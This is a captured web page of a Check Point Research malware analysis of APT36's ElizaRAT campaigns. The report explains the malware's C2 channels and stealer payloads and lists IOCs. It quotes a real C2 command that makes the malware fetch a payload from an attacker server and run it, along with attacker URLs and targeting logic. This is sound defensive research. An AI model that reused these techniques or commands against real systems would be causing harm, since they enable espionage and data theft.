research.checkpoint.com
Open in
urlscan Pro
141.193.213.20
Public Scan
URL:
https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/
Submission: On November 05 via api from IN — Scanned from US
Submission: On November 05 via api from IN — Scanned from US
Form analysis 1 forms found in the DOM
POST /2024/the-evolution-of-transparent-tribes-new-malware/#wpcf7-f26727-o1
<form action="/2024/the-evolution-of-transparent-tribes-new-malware/#wpcf7-f26727-o1" method="post" class="wpcf7-form demo resetting" aria-label="Contact form" novalidate="novalidate" data-status="resetting">
<div style="display: none;">
<input type="hidden" name="_wpcf7" value="26727">
<input type="hidden" name="_wpcf7_version" value="6.0">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f26727-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
</div>
<div class="contact-form-outer">
<div class="flex-row">
<div class="flex-12">
<div class="col-margin">
<p><label>First Name<span class="wpcf7-form-control-wrap" data-name="your-first-name"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false"
value="" type="text" name="your-first-name"></span></label>
</p>
</div>
</div>
<div class="flex-12">
<div class="col-margin">
<p><label>Last Name<span class="wpcf7-form-control-wrap" data-name="your-last-name"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false"
value="" type="text" name="your-last-name"></span></label>
</p>
</div>
</div>
<div class="flex-12">
<div class="col-margin">
<p><label>Country<span class="wpcf7-form-control-wrap" data-name="country"><select class="wpcf7-form-control wpcf7-select classform-control" aria-invalid="false" name="country">
<option value="">—Please choose an option—</option>
<option value="China">China</option>
<option value="India">India</option>
<option value="United States">United States</option>
<option value="Indonesia">Indonesia</option>
<option value="Brazil">Brazil</option>
<option value="Pakistan">Pakistan</option>
<option value="Nigeria">Nigeria</option>
<option value="Bangladesh">Bangladesh</option>
<option value="Russia">Russia</option>
<option value="Japan">Japan</option>
<option value="Mexico">Mexico</option>
<option value="Philippines">Philippines</option>
<option value="Vietnam">Vietnam</option>
<option value="Ethiopia">Ethiopia</option>
<option value="Egypt">Egypt</option>
<option value="Germany">Germany</option>
<option value="Iran">Iran</option>
<option value="Turkey">Turkey</option>
<option value="Democratic Republic of the Congo">Democratic Republic of the Congo</option>
<option value="Thailand">Thailand</option>
<option value="France">France</option>
<option value="United Kingdom">United Kingdom</option>
<option value="Italy">Italy</option>
<option value="Burma">Burma</option>
<option value="South Africa">South Africa</option>
<option value="South Korea">South Korea</option>
<option value="Colombia">Colombia</option>
<option value="Spain">Spain</option>
<option value="Ukraine">Ukraine</option>
<option value="Tanzania">Tanzania</option>
<option value="Kenya">Kenya</option>
<option value="Argentina">Argentina</option>
<option value="Algeria">Algeria</option>
<option value="Poland">Poland</option>
<option value="Sudan">Sudan</option>
<option value="Uganda">Uganda</option>
<option value="Canada">Canada</option>
<option value="Iraq">Iraq</option>
<option value="Morocco">Morocco</option>
<option value="Peru">Peru</option>
<option value="Uzbekistan">Uzbekistan</option>
<option value="Saudi Arabia">Saudi Arabia</option>
<option value="Malaysia">Malaysia</option>
<option value="Venezuela">Venezuela</option>
<option value="Nepal">Nepal</option>
<option value="Afghanistan">Afghanistan</option>
<option value="Yemen">Yemen</option>
<option value="North Korea">North Korea</option>
<option value="Ghana">Ghana</option>
<option value="Mozambique">Mozambique</option>
<option value="Taiwan">Taiwan</option>
<option value="Australia">Australia</option>
<option value="Ivory Coast">Ivory Coast</option>
<option value="Syria">Syria</option>
<option value="Madagascar">Madagascar</option>
<option value="Angola">Angola</option>
<option value="Cameroon">Cameroon</option>
<option value="Sri Lanka">Sri Lanka</option>
<option value="Romania">Romania</option>
<option value="Burkina Faso">Burkina Faso</option>
<option value="Niger">Niger</option>
<option value="Kazakhstan">Kazakhstan</option>
<option value="Netherlands">Netherlands</option>
<option value="Chile">Chile</option>
<option value="Malawi">Malawi</option>
<option value="Ecuador">Ecuador</option>
<option value="Guatemala">Guatemala</option>
<option value="Mali">Mali</option>
<option value="Cambodia">Cambodia</option>
<option value="Senegal">Senegal</option>
<option value="Zambia">Zambia</option>
<option value="Zimbabwe">Zimbabwe</option>
<option value="Chad">Chad</option>
<option value="South Sudan">South Sudan</option>
<option value="Belgium">Belgium</option>
<option value="Cuba">Cuba</option>
<option value="Tunisia">Tunisia</option>
<option value="Guinea">Guinea</option>
<option value="Greece">Greece</option>
<option value="Portugal">Portugal</option>
<option value="Rwanda">Rwanda</option>
<option value="Czech Republic">Czech Republic</option>
<option value="Somalia">Somalia</option>
<option value="Haiti">Haiti</option>
<option value="Benin">Benin</option>
<option value="Burundi">Burundi</option>
<option value="Bolivia">Bolivia</option>
<option value="Hungary">Hungary</option>
<option value="Sweden">Sweden</option>
<option value="Belarus">Belarus</option>
<option value="Dominican Republic">Dominican Republic</option>
<option value="Azerbaijan">Azerbaijan</option>
<option value="Honduras">Honduras</option>
<option value="Austria">Austria</option>
<option value="United Arab Emirates">United Arab Emirates</option>
<option value="Israel">Israel</option>
<option value="Switzerland">Switzerland</option>
<option value="Tajikistan">Tajikistan</option>
<option value="Bulgaria">Bulgaria</option>
<option value="Hong Kong (China)">Hong Kong (China)</option>
<option value="Serbia">Serbia</option>
<option value="Papua New Guinea">Papua New Guinea</option>
<option value="Paraguay">Paraguay</option>
<option value="Laos">Laos</option>
<option value="Jordan">Jordan</option>
<option value="El Salvador">El Salvador</option>
<option value="Eritrea">Eritrea</option>
<option value="Libya">Libya</option>
<option value="Togo">Togo</option>
<option value="Sierra Leone">Sierra Leone</option>
<option value="Nicaragua">Nicaragua</option>
<option value="Kyrgyzstan">Kyrgyzstan</option>
<option value="Denmark">Denmark</option>
<option value="Finland">Finland</option>
<option value="Slovakia">Slovakia</option>
<option value="Singapore">Singapore</option>
<option value="Turkmenistan">Turkmenistan</option>
<option value="Norway">Norway</option>
<option value="Lebanon">Lebanon</option>
<option value="Costa Rica">Costa Rica</option>
<option value="Central African Republic">Central African Republic</option>
<option value="Ireland">Ireland</option>
<option value="Georgia">Georgia</option>
<option value="New Zealand">New Zealand</option>
<option value="Republic of the Congo">Republic of the Congo</option>
<option value="Palestine">Palestine</option>
<option value="Liberia">Liberia</option>
<option value="Croatia">Croatia</option>
<option value="Oman">Oman</option>
<option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="Puerto Rico">Puerto Rico</option>
<option value="Kuwait">Kuwait</option>
<option value="Moldov">Moldov</option>
<option value="Mauritania">Mauritania</option>
<option value="Panama">Panama</option>
<option value="Uruguay">Uruguay</option>
<option value="Armenia">Armenia</option>
<option value="Lithuania">Lithuania</option>
<option value="Albania">Albania</option>
<option value="Mongolia">Mongolia</option>
<option value="Jamaica">Jamaica</option>
<option value="Namibia">Namibia</option>
<option value="Lesotho">Lesotho</option>
<option value="Qatar">Qatar</option>
<option value="Macedonia">Macedonia</option>
<option value="Slovenia">Slovenia</option>
<option value="Botswana">Botswana</option>
<option value="Latvia">Latvia</option>
<option value="Gambia">Gambia</option>
<option value="Kosovo">Kosovo</option>
<option value="Guinea-Bissau">Guinea-Bissau</option>
<option value="Gabon">Gabon</option>
<option value="Equatorial Guinea">Equatorial Guinea</option>
<option value="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="Estonia">Estonia</option>
<option value="Mauritius">Mauritius</option>
<option value="Swaziland">Swaziland</option>
<option value="Bahrain">Bahrain</option>
<option value="Timor-Leste">Timor-Leste</option>
<option value="Djibouti">Djibouti</option>
<option value="Cyprus">Cyprus</option>
<option value="Fiji">Fiji</option>
<option value="Reunion (France)">Reunion (France)</option>
<option value="Guyana">Guyana</option>
<option value="Comoros">Comoros</option>
<option value="Bhutan">Bhutan</option>
<option value="Montenegro">Montenegro</option>
<option value="Macau (China)">Macau (China)</option>
<option value="Solomon Islands">Solomon Islands</option>
<option value="Western Sahara">Western Sahara</option>
<option value="Luxembourg">Luxembourg</option>
<option value="Suriname">Suriname</option>
<option value="Cape Verde">Cape Verde</option>
<option value="Malta">Malta</option>
<option value="Guadeloupe (France)">Guadeloupe (France)</option>
<option value="Martinique (France)">Martinique (France)</option>
<option value="Brunei">Brunei</option>
<option value="Bahamas">Bahamas</option>
<option value="Iceland">Iceland</option>
<option value="Maldives">Maldives</option>
<option value="Belize">Belize</option>
<option value="Barbados">Barbados</option>
<option value="French Polynesia (France)">French Polynesia (France)</option>
<option value="Vanuatu">Vanuatu</option>
<option value="New Caledonia (France)">New Caledonia (France)</option>
<option value="French Guiana (France)">French Guiana (France)</option>
<option value="Mayotte (France)">Mayotte (France)</option>
<option value="Samoa">Samoa</option>
<option value="Sao Tom and Principe">Sao Tom and Principe</option>
<option value="Saint Lucia">Saint Lucia</option>
<option value="Guam (USA)">Guam (USA)</option>
<option value="Curacao (Netherlands)">Curacao (Netherlands)</option>
<option value="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="Kiribati">Kiribati</option>
<option value="United States Virgin Islands (USA)">United States Virgin Islands (USA)</option>
<option value="Grenada">Grenada</option>
<option value="Tonga">Tonga</option>
<option value="Aruba (Netherlands)">Aruba (Netherlands)</option>
<option value="Federated States of Micronesia">Federated States of Micronesia</option>
<option value="Jersey (UK)">Jersey (UK)</option>
<option value="Seychelles">Seychelles</option>
<option value="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="Isle of Man (UK)">Isle of Man (UK)</option>
<option value="Andorra">Andorra</option>
<option value="Dominica">Dominica</option>
<option value="Bermuda (UK)">Bermuda (UK)</option>
<option value="Guernsey (UK)">Guernsey (UK)</option>
<option value="Greenland (Denmark)">Greenland (Denmark)</option>
<option value="Marshall Islands">Marshall Islands</option>
<option value="American Samoa (USA)">American Samoa (USA)</option>
<option value="Cayman Islands (UK)">Cayman Islands (UK)</option>
<option value="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="Northern Mariana Islands (USA)">Northern Mariana Islands (USA)</option>
<option value="Faroe Islands (Denmark)">Faroe Islands (Denmark)</option>
<option value="Sint Maarten (Netherlands)">Sint Maarten (Netherlands)</option>
<option value="Saint Martin (France)">Saint Martin (France)</option>
<option value="Liechtenstein">Liechtenstein</option>
<option value="Monaco">Monaco</option>
<option value="San Marino">San Marino</option>
<option value="Turks and Caicos Islands (UK)">Turks and Caicos Islands (UK)</option>
<option value="Gibraltar (UK)">Gibraltar (UK)</option>
<option value="British Virgin Islands (UK)">British Virgin Islands (UK)</option>
<option value="Aland Islands (Finland)">Aland Islands (Finland)</option>
<option value="Caribbean Netherlands (Netherlands)">Caribbean Netherlands (Netherlands)</option>
<option value="Palau">Palau</option>
<option value="Cook Islands (NZ)">Cook Islands (NZ)</option>
<option value="Anguilla (UK)">Anguilla (UK)</option>
<option value="Wallis and Futuna (France)">Wallis and Futuna (France)</option>
<option value="Tuvalu">Tuvalu</option>
<option value="Nauru">Nauru</option>
<option value="Saint Barthelemy (France)">Saint Barthelemy (France)</option>
<option value="Saint Pierre and Miquelon (France)">Saint Pierre and Miquelon (France)</option>
<option value="Montserrat (UK)">Montserrat (UK)</option>
<option value="Saint Helena, Ascension and Tristan da Cunha (UK)">Saint Helena, Ascension and Tristan da Cunha (UK)</option>
<option value="Svalbard and Jan Mayen (Norway)">Svalbard and Jan Mayen (Norway)</option>
<option value="Falkland Islands (UK)">Falkland Islands (UK)</option>
<option value="Norfolk Island (Australia)">Norfolk Island (Australia)</option>
<option value="Christmas Island (Australia)">Christmas Island (Australia)</option>
<option value="Niue (NZ)">Niue (NZ)</option>
<option value="Tokelau (NZ)">Tokelau (NZ)</option>
<option value="Vatican City">Vatican City</option>
<option value="Cocos (Keeling) Islands (Australia)">Cocos (Keeling) Islands (Australia)</option>
<option value="Pitcairn Islands (UK)">Pitcairn Islands (UK)</option>
</select></span></label>
</p>
</div>
</div>
<div class="flex-12">
<div class="col-margin">
<p><label>Email<span class="wpcf7-form-control-wrap" data-name="your-email"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email form-control"
aria-required="true" aria-invalid="false" value="" type="email" name="your-email"></span></label>
</p>
</div>
</div>
<div class="flex-12">
<div class="col-margin">
<div class="button-wrap center relative">
<p><input class="wpcf7-form-control wpcf7-submit has-spinner button font-white" type="submit" value="SUBMIT"><span class="wpcf7-spinner"></span>
</p>
</div>
</div>
</div>
</div>
</div>
<div class="wpcf7-response-output" aria-hidden="true"></div>
</form>Text Content
* CONTACT US
* DISCLOSURE POLICY
* CHECKPOINT.COM
* UNDER ATTACK?
* Latest Publications
* CPR Podcast Channel
* Web 3.0 Security
* Intelligence Reports
* Resources
* ThreatCloud AI
* Threat Intelligence & Research
* Zero Day Protection
* Sandblast File Analysis
* About Us
* SUBSCRIBE
SUBSCRIBE
CATEGORIES
* Android Malware 23
* Artificial Intelligence 4
* ChatGPT 3
* Check Point Research Publications 389
* Cloud Security 1
* CPRadio 44
* Crypto 2
* Data & Threat Intelligence 1
* Data Analysis 0
* Demos 22
* Global Cyber Attack Reports 328
* How To Guides 12
* Ransomware 1
* Russo-Ukrainian War 1
* Security Report 1
* Threat and data analysis 0
* Threat Research 172
* Web 3.0 Security 9
* Wipers 0
CLOUDY WITH A CHANCE OF RATS: UNVEILING APT36 AND THE EVOLUTION OF ELIZARAT
November 4, 2024
https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/
INTRODUCTION
APT36, also known as Transparent Tribe, is a Pakistan-based threat actor
notorious for persistently targeting Indian government organizations, diplomatic
personnel, and military facilities. APT36 has conducted numerous cyber-espionage
campaigns against Windows, Linux, and Android systems.
In recent campaigns, APT36 utilized a particularly insidious Windows RAT known
as ElizaRAT. First discovered in 2023, ElizaRAT has significantly evolved to
enhance its evasion techniques and maintain reliability in its command and
control (C2) communication.
This report focuses on ElizaRAT’s evolution. We examine the various payloads and
infrastructures employed by APT36 and the malware’s inner workings, including
deployment methods, second-stage payloads, and the persistent use of cloud
infrastructure.
KEY FINDINGS
* Check Point Research is closely tracking the persistent use of ElizaRAT, a
custom implant deployed by Transparent Tribe (aka APT36) in targeted attacks
on high-profile entities in India. We observed multiple, likely successful,
campaigns of Transparent Tribe in India in 2024.
* Our analysis of recent campaigns reveals continuous enhancements in the
malware’s evasion techniques, along with introducing a new stealer payload
called “ApoloStealer.”
* ElizaRAT samples indicate a systematic abuse of cloud-based services,
including Telegram, Google Drive, and Slack, to facilitate command and
control communications.
ELIZARAT – BACKGROUND AND EVOLUTION
First publicly disclosed in September 2023, ElizaRAT is a Windows Remote Access
Tool (RAT) utilized by Transparent Tribe in targeted attacks. ElizaRAT
infections are often initiated by CPL files distributed through Google Storage
links, likely distributed by phishing. ElizaRAT used Telegram channels in its
earlier variants to facilitate Command and Control (C2) communication.
Since its discovery, ElizaRAT’s execution methods, detection evasion, and C2
communication have all evolved. This was apparent in three distinct campaigns
that utilized the malware at the end of 2023 and the beginning of 2024. In each
campaign, the attacker used a different variant of ElizaRAT to download specific
second-stage payloads that automatically collect information.
The main characteristics of ElizaRAT include:
* Written in .NET and the use of Costura to embed .NET and assembly modules.
* Execution through Control Panel (.CPL) files
* Use of cloud services such as Google, Telegram, and Slack for distribution
and C2 communication
* Drops lure documents or videos as decoys
* In most samples, uses IWSHshell to create a Windows shortcut to the malware
* In most samples, uses SQLite as a resource to store files from the victim’s
machine in a local database before exfiltration
* Generates and stores a unique victim ID in a separate file on the machine.
Figure 1 – Campaign timeline, according to the malware compilation timestamps
SLACK CAMPAIGN
SLACKAPI.DLL – ELIZARAT
SlackAPI.dll (MD5: 2b1101f9078646482eb1ae497d44104) is an ElizaRAT variant that
leverages Slack channels as C2 infrastructure. It was compiled at the end of
2023 and is executed as a CPL file. CPL files are directly invoked by a double
click, making spear phishing a convenient infection route.
This variant most closely resembles the original Textsource variants of ElizaRAT
in terms of asynchronous code, functionality, and execution. It follows all the
ElizaRAT characteristics and base creation functionality:
* Generates user info file: Creates the Userinfo.dll file within the working
directory and stores in it the victim ID in the following
manner: <username>-<machinename>-<random between 200 to 600>.
* Creates the working directory: Establishes a new directory
at %appdata%\SlackAPI.
* Logging: Logs its actions to a text file (logs.txt) in
the %appdata%\SlackAPI directory.
* Time zone check: Checks if the local time zone is India Standard Time.
* Decoys: Drops a decoy mp4 file.
To register the victims in the attacker C2, the malware reads the content
of Userinfo.dll and sends it to the C2 server. The malware then continuously
checks the C2 for new commands every 60 seconds.
It consists of three classes of code:
* CplAppletDelegate – Includes the MAIN function and the fundamental execution
processes.
* Communication – Responsible for the C2 communication.
* Controls – Contains functions for each command that the malware can receive
from the C2.
The content received from the C2 is processed by the FormatMsgs function, which
knows how to parse the content and run the related function from
the Controls according to the command received from the C2.
The following are the commands the malware can process:
CommandDescriptionFunctionfilesDownloads a file specified in the C2 message and
acknowledges the download to the C2.Controls.DownloadFilescreenshotCaptures a
screenshot of the infected system’s desktop and uploads it to the
C2.Controls.screenshotonlineSends the current user information (stored
in Userinfo.dll) to the C2 to confirm that the system is
online.Controls.onlinedirSends a directory listing of a specified path on the
victim’s machine to the C2.Controls.DirectoryInfouploadUploads a specified file
from the victim’s machine to the C2.Controls.UploadfileRunFileExecutes a
specified file stored in the working directory.Controls.RunFileexitTerminates
the malware execution on the victim’s machine.Environment.Exit(0)infoCollects
and sends detailed system information, including OS version and installed
antivirus software.Controls.Information
The C2 communication in SlackAPI.dll is managed through the Communication class,
which uses Slack’s API to interact with the attacker.
The ReceiveMsgsInList() function continuously polls the channel C06BM9XTVAS via
the Slack API
at https://slack[.]com/api/conversations.history?channel=C06BM9XTVAS&count=1&limit=1,
using the bot token and the victim ID content in the request. This function runs
in an endless loop, checking for new commands every 60 seconds.
For message and file handling, the SendMsg() function sends messages to the C2
by posting to https://slack.com/api/chat.postMessage with the content and
channel ID C06BWCMSF1S, while SendFile() uploads files to the same channel
using https://slack.com/api/files.upload. The DownloadFile() function retrieves
files from a provided URL, saving them to the victim’s machine
using HttpClient and the bot token for secure access.
APOLOSTEALER (SLACKFILES.DLL)
The threat actor deployed an additional payload, which we named ApoloStealer, on
specific targets. According to the compilation time, the variant of ApoloStealer
used in this campaign was compiled one month after the ElizaRAT SlackAPI.dll
variant, which might suggest that additional payloads are involved.
ApoloStealer employs techniques similar to other Transparent Tribe malware:
* Checks the local time zone is India Standard time.
* The working directory is the same as SlackAPI.dll – %appdata%\SlackAPI.
* Includes SQLite.Interop.dll as a resource and two other mp4 files used as
decoys.
* Creates a user info file with the name appid.dll and stores the victim ID in
a similar manner: <username>-<machinename>-<random between 500-1000>.
* Registers the victim at the attacker C2, http://83.171.248[.]67/suitboot.php,
and waits for a response.
* Creates an LNK shortcut via IWSHELL to run the file using rundll.
* Logs all its action in a local log file created in the working
directory %appdata%\SlackAPI\rlogs.txt.
After creating the database file, ApoloStealer creates a table to store data in
these fields: filename, file path, flag, type, and modified date. The malware
then collects all DESKTOP files that do not start with ~ or ! and have one of
the following extensions:
.ppt, .pptx, .pptm, .potx, .potm, .pot, .ppsx, .ppsm, .odp, .doc, .docm, .docx,
.dot, .dotm, .dotx, .odt, .rtf, .pdf, .xls, .xlsx, .csv, .txt, .zip, .rar, .png,
.jpg, .tar, .jpeg, .raw, .svg, .dwg, .heif, .heic, .psd
After storing all the relevant files in the database file, ApoloStealer sends
the data to the C2 server at the URL http://83.171.248[.]67/oneten.php.
The malware repeats the same process for the Downloads directory, OneDrive
directory, and each fixed drive on the machine, except for C:\.
CIRCLE CAMPAIGN
Compiled in January 2024, the Circle ElizaRAT variant is an improved version of
the malware. It utilizes an additional dropper component, which results in much
lower detection rates. The Circle campaign uses a payload that resembles the
SlackFiles payload and uses a similar working directory (%appdata%\SlackAPI).
Unlike other ElizaRAT variants, the Circle campaign does not use any cloud
service as C2 infrastructure and instead uses a simple virtual private server
(VPS) for C2 communication.
Figure 3 – Circle Infection Chain.
CIRCLE DROPPER
The sole purpose of the dropper is to set up the necessities for the execution
of ElizaRAT. The function BringCircle drops and unpacks a zip file embedded as a
resource containing the ElizaRAT malware. It also creates the working
directory %appdata%\CircleCpl and drops the decoy PDF document and MP4 file.
Another feature of the malware, a known characteristic of ElizaRAT, is the
creation of an LNK file for the malware, but there is no indication that any of
the malware uses it. Note that the description of the LNK is Slack API
File, which also implicates this cluster as part of the Slack campaign.
Figure 4 – Use of WshShell to create the LNK file.
After dropping the malware, the dropper executes it with a
simple Process.start() function.
CIRCLE – ELIZARAT
This is the ElizaRAT variant utilized in the Circle campaign cluster. It
performs the same checks and base creation as all other variants:
* Checks if the time zone is set to India Standard Time.
* Registers the victim’s information in a DLL file located in the working
directory %appdata%\CircleCpl, which is created by the dropper. It then sends
its content to the attacker C2 at the
URL http://38.54.84[.]83/MiddleWare/NewClient.
* Victim registration occurs in two files:
* Applicationid.dll: Stores a victim ID combining a random number (100-1000),
the username, and the machine name (<random
100-1000>-<username>-<machinename>), similar to other ElizaRAT variants.
* Applicationinfo.dll: Stores detailed victim information in the
format {machinename}>{username}>{IP}>{OS}>{machinetype}.
* Retrieves the victim’s IP address by accessing the
URL https://check.torproject.org/api/ip, most likely to identify the victim’s
outbound IP address.
To get a new task from the attacker, the malware sends the content of
the applicationid.dll, with the addition of x002> at the start of the string, to
the URL http://38.54.84[.]83/MiddleWare/GetTask and waits for the response.
There are three tasks the malware can receive from the attacker:
* at>{URI} – In this case, the malware triggers the DownloadFile() function,
which will download the file from the URL http://38.54.84[.]83/uploads/{URI}.
* in>{URL} – The malware triggers the DownloadFile() function, which will
download a file from the given URL.
* NA>NA – The malware sleeps for 2 minutes and then triggers
the Awake() function again.
Figure 5 – An HTTP stream example of the malware’s communication.
If the malware triggers the DownloadFile() function, it will also trigger
the ExtractFile() function, designed to unpack a zip file.
Figure 6 – ExtractFile() function.
The zip file contains the SQLite DLL, which will be used in the second-stage
payload. It is extracted to %appdata%\SlackAPI, the same working directory as
the Slack campaign. If we examine the RunFile() function, we can see it is
designated to execute the SlackFiles.dll stealer.
Figure 7 – RunFile() function. The sfdll variable is equal to SlackFiles.dll.
The fact that this malware is designated to download the SlackFiles.dll payload
and use the same working directory as the Slack campaign suggests that these two
activity clusters are part of the same campaign.
GOOGLE DRIVE CAMPAIGN
The initial infection vector used in this campaign is not clear. However, based
on the file names, such as Amended Copy.cpl and Threat Alert 1307-JS-9.pdf
issued vide NATRAD note number 2511 CLKj dated 10 Aug 2024 in aspect of exercise
Tarang Shakti-2024.pdf.cpl, as well as past campaigns by the threat actor, they
were likely sent via spear phishing.
Figure 8 – Google Drive-based Campaign Infection Chain.
Much like previous versions, the CPL file is a dropper responsible for setting
up all the necessities for the next stage, including:
* Create the working directory ApplicationData\BaseFilteringEngine
* Register the victim
* Establish persistence through a schedule task
* Drop ElizaRAT files, including the decoy PDF, an X.509 certificate, and the
main ElizaRAT variant (BaseFilterEngine.dll)
COMMAND AND CONTROL
The ElizaRAT variant used in this campaign leverages Google Cloud for its C2
communication. Utilizing the Google C2 channel, the actor sends commands to
download the next stage payload from different virtual private servers (VPS). In
this campaign, we observed the use of three different VPS.
The main ElizaRAT malware (baseFilteringEngine.dll) uses the X.509 certificate
to create a ServiceAccountCredential object for authenticating a Google Cloud
Storage service account: xijinping@round-catfish-416409.iam.gserviceaccount.com.
The email associated with this service account is fikumatry@gmail.com . The
malware checks for the parent folder 1Gwy3yPyyYJVoOvCMfsmhhCknC-tiuNFv and lists
all the files in that folder. Next, it locates the related victim’s tmp1 file,
gets the commands and logs its actions.
The only command the malware can process is the Transfer command, which directs
the malware to download a payload from a specific VPS address. Below is a sample
format of the command the malware received for the chosen victims:
Transfer:!http://84.247.135[.]235:8080/phenomenon/SpotifyAB.zip:!rundll32.exe:!SpotifyAB.dll:!SpotifyAB.zip:!Mean:!Doj!@g8H6fb:!SpotifyAB
The malware splits the command at :! into an array, where each element
represents a specific parameter of the operation:
array[0]The operation to execute: “Transfer”array[1]Download URL.array[2]Process
to execute the file (parent).array[3]File name.array[4]File
name.array[5]Function to execute.array[6]Zip password.array[7]Name of the folder
to create and store.
When processing the command, the following sequence is triggered:
1. A folder is created as specified.
2. The function DownloadProtection downloads a file using
an HttpWebRequest from a specified URL to the file with the specified name
in the working folder.
3. The function Withdraw extracts the received file using the provided
password.
4. The function BetaDrum creates a scheduled task that runs the file with the
provided parent every 5 minutes.
5. A message is sent to the server indicating the successful operation.
PAYLOADS – GOOGLE DRIVE CAMPAIGN
So far, we’ve seen two payloads utilized in this
campaign: extensionhelper_64.dll and ConnectX.dll. Both payloads function as
info stealers, each designed for a specific purpose. Despite these minor
changes, the payloads’ core functionality and primary purpose remained
consistent throughout the campaign.
APOLOSTEALER (STEALER EXTENSIONHELPER_64)
The extensionhelper_64.dll file is downloaded to the victim’s machine
as SpotifyAB.dll or Spotify-news.dll and is executed by the scheduled task,
which runs the Mean function via rundll32.exe. This payload is a file stealer
that collects specific file types, stores their metadata in a database, and
exfiltrates it to the C2 server.
First, the malware creates an SQLite database file, which interacts with using
the DBmanager class and the SQLite.Interop.dll. The SQLite DLL is embedded in
the malware in a protected zip file, which the malware extracted using a plain
text password.
While iterating over all files on the fixed drives, the malware skips
directories such as Program Files, Windows, ProgramData, and AppData to avoid
processing system directories. It also filters out files that start with $, .,
or ~, which are typically system or temporary files. The malware is only
interested in these file suffixes:
.xla .xlam .xll .xlm .xlsm .xlt .xltm .xltx .dif .xls .xlsx .ppt .pptx .pot
.potm .potx .ppam .pps .ppsm .ppsx .pptm .pub .rtf .sldm .sldx .pdf .jpg .png
.jpeg .odf .odg .zip .csv .xlc .rar .tar
The malware stores the name, path, and another parameter called isUploaded for
each relevant file. isUploaded is a boolean variable indicating whether the file
was uploaded to the C2. If a file wasn’t uploaded to the C2, the malware calls
the sendRequest function, which reads the file’s byte content and sends it to
the C2 while updating its upload status.
Like the other malware in this campaign, it also hides some of its operations in
a text blob, which it splits by ‘ ‘ (space). The information it tries to hide
includes its C2 server and the different web pages it communicates with, even
though they are not eventually used:
Figure 9 – The text blob used to hide some strings in the payload, split by
space.
CONNECTX – USB STEALER
An additional payload is designed to examine files on external drives, such as
USBs. This malware utilizes WMI (Windows Management Instrumentation) to list all
relevant files on external drives and targets the same file extensions. However,
instead of storing them in a database, it stores them in an archive it creates
in the BaseFilteringEngine working directory.
The malware uses WMI to monitor the creation of new disk drives every two
seconds, most likely to detect the insertion of a USB drive:
SELECT * FROM __InstanceCreationEvent WITHIN 2 WHERE TargetInstance ISA
'Win32_DiskDrive'
For each device, it retrieves the device ID and serial number and checks for the
correct disk partition to iterate on. Unlike other ElizaRAT-associated stealers,
ConnectX doesn’t have a C2 server to exfiltrate the data to; it just stores the
data in a zip file in the ElizaRAT working directory
%appdata%\BaseFilteringEngine.
ATTRIBUTION
ElizaRAT is a custom tool known to be employed exclusively by “Transparent
Tribe” against targets similar to those described in this report. This is in
addition to other indicators linked to the group’s campaigns, including using an
overlapping email account in a different activity cluster
targeting Linux systems.
Like other malware associated with Transparent Tribe, all the samples presented
here used the name Apolo Jones. In the Google Drive campaign, the decoy PDF file
attributes its authorship to Apolo Jones, a distinctive name previously observed
in various aspects of Transparent Tribe’s operations.
Figure 10 -ElizaRAT lure PDF Metadata.
The use of Apolo Jones occurs differently in the campaigns. For example, in the
Circle dropper, the password ApoloJones2024 is used to uncompress the zip file.
In addition, the function responsible for checking the time zone in
the SlackFiles.dll payload is also named ApoloJones.
VICTIMOLOGY
The internal checks the ElizaRAT variants perform suggest the campaigns
exclusively targeted Indian systems, evidenced by each malware variant’s initial
function of verifying whether the system’s time zone was set to 'India Standard
Time’.
Figure 11 – An example of the time zone check in the SlackFiles.dll payload.
This function occurs in all samples.
CONCLUSION
The progression of ElizaRAT reflects APT36’s deliberate efforts to enhance their
malware to better evade detection and effectively target Indian entities. By
integrating cloud services like Google Drive, Telegram, and Slack into their
command and control infrastructure, they exploit commonly used platforms to mask
their activities within regular network traffic.
Introducing new payloads such as ApolloStealer marks a significant expansion of
APT36’s malware arsenal and suggests the group is adopting a more flexible,
modular approach to payload deployment. These methods primarily focus on data
collection and exfiltration, underscoring their sustained emphasis on
intelligence gathering and espionage.
PROTECTION
Harmony Endpoint
* APT.Win.ElizaRAT.B/C/D
Threat Emulation
* RAT.Wins.Eliza.ta.A/B/C/D
IOCS
Files
TypeValueDescriptionMD5730f708f2788fc83e15e93edd89f8c59ElizaRAT Dropper
BaseFilter.dll
(amended
copy.cpl)SHA1549d80d0d2c3e2cf3ea530f37bfc0b9fe0cbd5f4SHA25606d9662572a47d31a51adf1e0085278e0233e4299e0d7477e5e4a3a328dea9d1MD50cd16d0a2768b9ec0d980ccf875b2724ElizaRAT
BaseFilteringEngine.dllSHA188fd8d71d879257b6cbf2bc12b6493771b26d8a0SHA256a7fd97177186aff9f442beb9da6b1ab3aff47e611b94609404e755dd2f97dce8MD50673341ccceeace3f0b268488f05db80ElizaRAT
Dropper
BaseFilter.dll
(Tarang
Shakti)SHA1bc62b98437abd81a1471633afb9cff5dd898cdf8SHA25670bafcf666e8e821212f55ea302285bb860d2b7c18089592a4a093825adbaa71MD52b1101f9078646482eb1ae497d44104cElizaRAT
SlackAPI.dllSHA16ac91c9e6beeacd74c56dfde9025e54e221b016cSHA25660b0b6755cf03ea8f6748a1e8b74a80a3d7637c986df64ee292f5ffefcd610a2MD5795d1be0915ec60c764b7a7aa6c54334ElizaRAT
Dropper
circledrop.cplSHA186afc3e8046dfff3ec06bd50ae38f1da7797c3e2SHA2567e04e62f337c5059757956594b703fc1a995d436c48efa17c45eb0f80af8a890MD58703b910ece27b578f231ce5eb1afd8fElizaRAT
